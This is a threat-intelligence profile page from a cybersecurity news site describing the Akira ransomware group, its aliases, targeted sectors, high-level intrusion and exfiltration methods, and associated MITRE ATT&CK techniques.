Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Matrix Botnet

Akira (Ransomware Group) – Threat Actor

January 28, 2025
Reading Time: 3 mins read
in Threat Actors
Akira (Ransomware Group) – Threat Actor

Akira Group

Additional Names

Storm-1567, GOLD SAHARA, PUNK SPIDER

Date of Initial Activity

2023

Location

Unknown

Suspected Attribution 

Ransomware Group

Motivation

FInancial Gain

Software

Servers

Overview

The Akira Group has emerged as a notable player in the ransomware landscape since its operations began in March 2023. Characterized by a unique retro aesthetic on their data leak site, this group quickly gained attention for its sophisticated and aggressive approach to cyber extortion. Utilizing multi-extortion tactics, the Akira Group not only encrypts victims’ data but also threatens to release sensitive information on their TOR-based website if ransom demands are not met. This layered approach intensifies the pressure on victims, often leading to significant financial losses. Targeting a diverse range of sectors, including education, finance, manufacturing, real estate, and healthcare, the Akira Group does not discriminate when it comes to selecting its victims. Their operations are marked by a striking lack of specificity, as they primarily focus on large enterprises, leveraging vulnerabilities in public-facing applications and services to gain initial access. This indiscriminate targeting has raised alarms across industries, as organizations scramble to bolster their defenses against this evolving threat. Technically, the Akira Group employs a series of sophisticated methods to infiltrate systems, often exploiting weaknesses in multi-factor authentication (MFA) and known vulnerabilities in Virtual Private Network (VPN) software. Once inside, they use advanced tools and techniques to move laterally within the network, dumping credentials and escalating privileges as necessary. The group has gained notoriety for its use of PowerShell commands to execute critical ransomware payloads, remove volume shadow copies, and encrypt files, all while employing clever evasion tactics to avoid detection.

Common Targets 

  • Information
  • Retail Trade
  • Finance and Insurance
  • Educational Services
  • Health Care and Social Assistance

Attack vectors

Software Vulnerabilities

How they work

Initial Access

The initial foothold on the system is obtained via several methods. Multi-factor authentication (MFA) exploitation (i.e. CVE-2023-20269) is mostly used in observed campaigns, along with known vulnerabilities in public facing services, such as RDP. Spear phishing is also used to gain a foothold, which is generally more effective than plain phishing, as it’s addressed to a specific user (group) and/or a relevant theme for the recipient(s).

Escalation and Lateral Movement

To escalate privileges and/or move laterally, LSASS dumps are used. Additionally, or alternatively, RDP is used to connect to other machines within the network while moving laterally. Other tools used are PCHunter64, LaZagne, and Mimikatz.

Data Collection and Exfiltration

Once the actors are in the system, data is exfiltrated by the actor. This way, the victim can be extorted twice: once to recover encrypted files, and once to ensure the stolen data is not made available publicly on the Akira extortion blog. To upload the gathered files, RClone, WinSCP, and FileZilla have been observed in use.

MITRE ATT&CK Techniques

T1003.001 OS Credential Dumping: LSASS Memory T1048 Exfiltration Over Alternative Protocol T1021.001 Remote Services: Remote Desktop Protocol T1059.001 Command and Scripting Interpreter: PowerShell T1106 Native API T1190 Exploit Public-Facing Application T1486 Data Encrypted for Impact T1490 Inhibit System Recovery T1566 Phishing T1584 Compromise Infrastructure
References:
  • Akira
  • Akira Ransomware
Tags: Akira groupGOLD SAHARAHealth CareMFAPUNK SPIDERRansomwareStorm-1567Threat ActorsVulnerabilities
ADVERTISEMENT

Related Posts

Storm-1811 (Cybercriminal) – Threat Actor

Storm-1811 (Cybercriminal) – Threat Actor

March 2, 2025
CopyCop (State-Sponsored) – Threat Actor

CopyCop (State-Sponsored) – Threat Actor

March 2, 2025
Storm-0539 – Threat Actor

Storm-0539 – Threat Actor

March 2, 2025
Void Manticore (Storm-0842) – Threat Actor

Void Manticore (Storm-0842) – Threat Actor

March 2, 2025
Unfading Sea Haze – Threat Actor

Unfading Sea Haze – Threat Actor

March 2, 2025
Ikaruz Red Team – Threat Actor

Ikaruz Red Team – Threat Actor

March 2, 2025

Latest Alerts

X Scam Targets Crypto Users with Fake Ads

FBI Warns Cybercriminals Exploit Routers

FreeDrain Phishing Steals Crypto Funds

CoGUI Targets Consumer and Finance Brands

COLDRIVER Hackers Target Sensitive Data

Cisco Fixes Flaw in IOS Wireless Controller

Subscribe to our newsletter

    Latest Incidents

    LockBit Ransomware Data Leaked After Hack

    Spanish Consumer Group Faces Cyberattack

    Education Giant Pearson Hit by Data Breach

    Masimo Cyberattack Disrupts Manufacturing

    Cyberattack Targets Tepotzotlán Facebook

    West Lothian Schools Hit by Ransomware

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial